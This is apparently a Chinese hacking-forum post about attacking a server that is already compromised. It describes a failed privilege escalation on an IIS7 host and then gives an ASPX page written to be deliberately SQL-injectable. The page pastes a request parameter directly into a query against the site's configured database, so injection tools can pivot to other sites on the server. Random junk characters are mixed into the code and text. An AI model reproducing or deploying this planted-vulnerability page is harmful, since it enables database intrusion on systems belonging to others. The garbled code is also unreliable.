利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。
0 p$ N  X; x0 ]4 B8 F# p
​
' ?, x' `4 I8 r5 ^8 O  k<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
2 S2 ]3 O+ |# A# j1 T; L     <script language="c#" runat="server">
) U$ v; @" j+ A7 ?: C  z* _- ]            
         void page_init(object sender, EventArgs e)
, _6 h+ z, h( w8 o         {
" D2 k5 ~5 g  _: u2 c            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
2 \) o* D1 f6 @6 G             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
5 A" F7 {, i3 g) l             conn.Open();
            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
8 }; @7 E$ ]5 }5 J2 [             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
) j  t8 Q4 [3 P3 d: j             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
- E5 y8 P' Q5 e" t: K8 u             Response.Write(x);
' s5 \8 J3 I6 ~% f( K5 a             conn.Close();
         }
6 J$ n' V5 u8 w3 z: K% P* J     
  </script>
- j( @+ P$ {2 V) J/ J    </div>
    </form>
</body>
1 \. Q1 h1 Z: ]  O</html>
2 U! U$ D2 d, ^5 i1 }8 C